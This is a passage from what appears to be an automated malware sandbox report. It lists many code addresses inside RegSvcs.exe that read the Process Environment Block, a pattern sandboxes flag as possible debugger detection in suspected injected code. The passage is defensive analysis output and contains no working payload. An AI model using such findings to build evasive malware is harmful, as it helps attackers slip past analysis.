            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013EC7C0 mov eax, dword ptr fs:[00000030h]  15_2_013EC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E262C mov eax, dword ptr fs:[00000030h]  15_2_013E262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013FE627 mov eax, dword ptr fs:[00000030h]  15_2_013FE627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141A660 mov eax, dword ptr fs:[00000030h]  15_2_0141A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141A660 mov eax, dword ptr fs:[00000030h]  15_2_0141A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014A866E mov eax, dword ptr fs:[00000030h]  15_2_014A866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014A866E mov eax, dword ptr fs:[00000030h]  15_2_014A866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]  15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]  15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]  15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]  15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]  15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]  15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]  15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01412674 mov eax, dword ptr fs:[00000030h]  15_2_01412674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0145E609 mov eax, dword ptr fs:[00000030h]  15_2_0145E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01422619 mov eax, dword ptr fs:[00000030h]  15_2_01422619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01416620 mov eax, dword ptr fs:[00000030h]  15_2_01416620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01418620 mov eax, dword ptr fs:[00000030h]  15_2_01418620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013FC640 mov eax, dword ptr fs:[00000030h]  15_2_013FC640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141A6C7 mov ebx, dword ptr fs:[00000030h]  15_2_0141A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141A6C7 mov eax, dword ptr fs:[00000030h]  15_2_0141A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E4690 mov eax, dword ptr fs:[00000030h]  15_2_013E4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E4690 mov eax, dword ptr fs:[00000030h]  15_2_013E4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0145E6F2 mov eax, dword ptr fs:[00000030h]  15_2_0145E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0145E6F2 mov eax, dword ptr fs:[00000030h]  15_2_0145E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0145E6F2 mov eax, dword ptr fs:[00000030h]  15_2_0145E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0145E6F2 mov eax, dword ptr fs:[00000030h]  15_2_0145E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014606F1 mov eax, dword ptr fs:[00000030h]  15_2_014606F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014606F1 mov eax, dword ptr fs:[00000030h]  15_2_014606F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0141C6A6 mov eax, dword ptr fs:[00000030h]  15_2_0141C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014166B0 mov eax, dword ptr fs:[00000030h]  15_2_014166B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01460946 mov eax, dword ptr fs:[00000030h]  15_2_01460946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014B4940 mov eax, dword ptr fs:[00000030h]  15_2_014B4940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01406962 mov eax, dword ptr fs:[00000030h]  15_2_01406962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01406962 mov eax, dword ptr fs:[00000030h]  15_2_01406962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01406962 mov eax, dword ptr fs:[00000030h]  15_2_01406962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013D8918 mov eax, dword ptr fs:[00000030h]  15_2_013D8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013D8918 mov eax, dword ptr fs:[00000030h]  15_2_013D8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0142096E mov eax, dword ptr fs:[00000030h]  15_2_0142096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0142096E mov edx, dword ptr fs:[00000030h]  15_2_0142096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0142096E mov eax, dword ptr fs:[00000030h]  15_2_0142096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01484978 mov eax, dword ptr fs:[00000030h]  15_2_01484978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_01484978 mov eax, dword ptr fs:[00000030h]  15_2_01484978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0146C97C mov eax, dword ptr fs:[00000030h]  15_2_0146C97C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0145E908 mov eax, dword ptr fs:[00000030h]  15_2_0145E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0145E908 mov eax, dword ptr fs:[00000030h]  15_2_0145E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0146C912 mov eax, dword ptr fs:[00000030h]  15_2_0146C912
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0146892A mov eax, dword ptr fs:[00000030h]  15_2_0146892A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_0147892B mov eax, dword ptr fs:[00000030h]  15_2_0147892B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014769C0 mov eax, dword ptr fs:[00000030h]  15_2_014769C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014149D0 mov eax, dword ptr fs:[00000030h]  15_2_014149D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E09AD mov eax, dword ptr fs:[00000030h]  15_2_013E09AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013E09AD mov eax, dword ptr fs:[00000030h]  15_2_013E09AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_014AA9D3 mov eax, dword ptr fs:[00000030h]  15_2_014AA9D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]  15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]  15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]  15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]  15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]  15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]  15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]  15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]  15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F29A0 mov eax, dword ptr fs:[00000030h]15_2_013F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146E9E0 mov eax, dword ptr fs:[00000030h]15_2_0146E9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014129F9 mov eax, dword ptr fs:[00000030h]15_2_014129F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014129F9 mov eax, dword ptr fs:[00000030h]15_2_014129F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA9D0 mov eax, dword ptr fs:[00000030h]15_2_013EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014689B3 mov esi, dword ptr fs:[00000030h]15_2_014689B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014689B3 mov eax, dword ptr fs:[00000030h]15_2_014689B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014689B3 mov eax, dword ptr fs:[00000030h]15_2_014689B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01410854 mov eax, dword ptr fs:[00000030h]15_2_01410854
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146E872 mov eax, dword ptr fs:[00000030h]15_2_0146E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146E872 mov eax, dword ptr fs:[00000030h]15_2_0146E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01476870 mov eax, dword ptr fs:[00000030h]15_2_01476870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01476870 mov eax, dword ptr fs:[00000030h]15_2_01476870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146C810 mov eax, dword ptr fs:[00000030h]15_2_0146C810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E4859 mov eax, dword ptr fs:[00000030h]15_2_013E4859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E4859 mov eax, dword ptr fs:[00000030h]15_2_013E4859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A830 mov eax, dword ptr fs:[00000030h]15_2_0141A830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148483A mov eax, dword ptr fs:[00000030h]15_2_0148483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148483A mov eax, dword ptr fs:[00000030h]15_2_0148483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov eax, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov eax, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov eax, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov ecx, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov eax, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01402835 mov eax, dword ptr fs:[00000030h]15_2_01402835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F2840 mov ecx, dword ptr fs:[00000030h]15_2_013F2840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E8C0 mov eax, dword ptr fs:[00000030h]15_2_0140E8C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B08C0 mov eax, dword ptr fs:[00000030h]15_2_014B08C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AA8E4 mov eax, dword ptr fs:[00000030h]15_2_014AA8E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141C8F9 mov eax, dword ptr fs:[00000030h]15_2_0141C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141C8F9 mov eax, dword ptr fs:[00000030h]15_2_0141C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E0887 mov eax, dword ptr fs:[00000030h]15_2_013E0887
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146C89D mov eax, dword ptr fs:[00000030h]15_2_0146C89D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01494B4B mov eax, dword ptr fs:[00000030h]15_2_01494B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01494B4B mov eax, dword ptr fs:[00000030h]15_2_01494B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01476B40 mov eax, dword ptr fs:[00000030h]15_2_01476B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01476B40 mov eax, dword ptr fs:[00000030h]15_2_01476B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014AAB40 mov eax, dword ptr fs:[00000030h]15_2_014AAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01488B42 mov eax, dword ptr fs:[00000030h]15_2_01488B42
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148EB50 mov eax, dword ptr fs:[00000030h]15_2_0148EB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B2B57 mov eax, dword ptr fs:[00000030h]15_2_014B2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B2B57 mov eax, dword ptr fs:[00000030h]15_2_014B2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B2B57 mov eax, dword ptr fs:[00000030h]15_2_014B2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B2B57 mov eax, dword ptr fs:[00000030h]15_2_014B2B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DCB7E mov eax, dword ptr fs:[00000030h]15_2_013DCB7E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4B00 mov eax, dword ptr fs:[00000030h]15_2_014B4B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145EB1D mov eax, dword ptr fs:[00000030h]15_2_0145EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140EB20 mov eax, dword ptr fs:[00000030h]15_2_0140EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140EB20 mov eax, dword ptr fs:[00000030h]15_2_0140EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A8B28 mov eax, dword ptr fs:[00000030h]15_2_014A8B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A8B28 mov eax, dword ptr fs:[00000030h]15_2_014A8B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D8B50 mov eax, dword ptr fs:[00000030h]15_2_013D8B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0BBE mov eax, dword ptr fs:[00000030h]15_2_013F0BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0BBE mov eax, dword ptr fs:[00000030h]15_2_013F0BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01400BCB mov eax, dword ptr fs:[00000030h]15_2_01400BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01400BCB mov eax, dword ptr fs:[00000030h]15_2_01400BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01400BCB mov eax, dword ptr fs:[00000030h]15_2_01400BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148EBD0 mov eax, dword ptr fs:[00000030h]15_2_0148EBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146CBF0 mov eax, dword ptr fs:[00000030h]15_2_0146CBF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140EBFC mov eax, dword ptr fs:[00000030h]15_2_0140EBFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8BF0 mov eax, dword ptr fs:[00000030h]15_2_013E8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8BF0 mov eax, dword ptr fs:[00000030h]15_2_013E8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8BF0 mov eax, dword ptr fs:[00000030h]15_2_013E8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E0BCD mov eax, dword ptr fs:[00000030h]15_2_013E0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E0BCD mov eax, dword ptr fs:[00000030h]15_2_013E0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E0BCD mov eax, dword ptr fs:[00000030h]15_2_013E0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01494BB0 mov eax, dword ptr fs:[00000030h]15_2_01494BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01494BB0 mov eax, dword ptr fs:[00000030h]15_2_01494BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148EA60 mov eax, dword ptr fs:[00000030h]15_2_0148EA60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141CA6F mov eax, dword ptr fs:[00000030h]15_2_0141CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141CA6F mov eax, dword ptr fs:[00000030h]15_2_0141CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141CA6F mov eax, dword ptr fs:[00000030h]15_2_0141CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145CA72 mov eax, dword ptr fs:[00000030h]15_2_0145CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145CA72 mov eax, dword ptr fs:[00000030h]15_2_0145CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146CA11 mov eax, dword ptr fs:[00000030h]15_2_0146CA11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0A5B mov eax, dword ptr fs:[00000030h]15_2_013F0A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0A5B mov eax, dword ptr fs:[00000030h]15_2_013F0A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141CA24 mov eax, dword ptr fs:[00000030h]15_2_0141CA24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140EA2E mov eax, dword ptr fs:[00000030h]15_2_0140EA2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E6A50 mov eax, dword ptr fs:[00000030h]15_2_013E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01404A35 mov eax, dword ptr fs:[00000030h]15_2_01404A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01404A35 mov eax, dword ptr fs:[00000030h]15_2_01404A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141CA38 mov eax, dword ptr fs:[00000030h]15_2_0141CA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01436ACC mov eax, dword ptr fs:[00000030h]15_2_01436ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01436ACC mov eax, dword ptr fs:[00000030h]15_2_01436ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01436ACC mov eax, dword ptr fs:[00000030h]15_2_01436ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01414AD0 mov eax, dword ptr fs:[00000030h]15_2_01414AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01414AD0 mov eax, dword ptr fs:[00000030h]15_2_01414AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8AA0 mov eax, dword ptr fs:[00000030h]15_2_013E8AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8AA0 mov eax, dword ptr fs:[00000030h]15_2_013E8AA0
